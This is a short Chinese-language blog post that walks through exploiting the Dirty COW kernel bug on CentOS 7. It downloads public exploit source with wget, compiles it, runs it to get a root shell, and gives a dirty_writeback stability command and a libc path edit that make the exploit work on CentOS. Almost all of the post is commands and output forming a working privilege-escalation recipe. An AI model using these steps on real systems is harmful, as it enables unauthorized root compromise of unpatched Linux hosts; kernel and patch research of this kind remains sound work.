Dirtycow 提权

发表于 | 分类于 |

实验环境

1
2
[centos@bogon ~]$ uname -a
Linux bogon 3.10.0-327.el7.x86_64 #1 SMP Thu Nov 19 22:10:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

下载

1
[centos@bogon ~]$ wget https://gist.githubusercontent.com/scumjr/17d91f20f73157c722ba2aea702985d2/raw/a37178567ca7b816a5c6f891080770feca5c74d7/dirtycow-mem.c

编译

会有几个警告

1
2
3
4
5
6
7
8
9
[centos@bogon ~]$ gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
dirtycow-mem.c: In function ‘get_range’:
dirtycow-mem.c:139:3: warning: use of assignment suppression and length modifier together in gnu_scanf format [-Wformat=]
   sscanf(line, "%lx-%lx %s %*Lx %*x:%*x %*Lu %s", start, end, flags, filename);
   ^
dirtycow-mem.c:139:3: warning: use of assignment suppression and length modifier together in gnu_scanf format [-Wformat=]
[centos@bogon ~]$ ls
Desktop       dirtycow-mem.c  Downloads  Pictures  Templates
dirtycow-mem  Documents       Music      Public    Videos

运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[centos@bogon ~]$ chmod 777 dirtycow-mem
[centos@bogon ~]$ ./dirtycow-mem
[*] range: 7ff3e2c78000-7ff3e2e2e000]
[*] getuid = 7ff3e2d362e0
[*] mmap 0x7ff3e2a75000
[*] exploiting (patch)
[*] patched (procselfmemThread)
[*] patched (madviseThread)
[root@bogon centos]# [*] exploiting (unpatch)
[*] unpatched: uid=1000 (procselfmemThread)
[*] unpatched: uid=1000 (madviseThread)
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
[root@bogon centos]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

记得执行否则可能死掉(阿里云直接死机,腾讯云返回原来的shell)

1
echo 0 > /proc/sys/vm/dirty_writeback_centisecs

centos7报错

1
2
3
4
[centos@bogon ~]$ ./dirtycow-mem
[*] range: 7f3944286000-7f394443c000]
[*] getuid = 7f39443442e0
dirtycow-mem: open("/lib/x86_64-linux-gnu/libc.so.6"): No such file or directory

修改dirtycow-mem.c

1
#define LIBC_PATH   "/lib/x86_64-linux-gnu/libc.so.6"

1
#define LIBC_PATH   "/usr/lib64/libc.so.6"
打赏
0%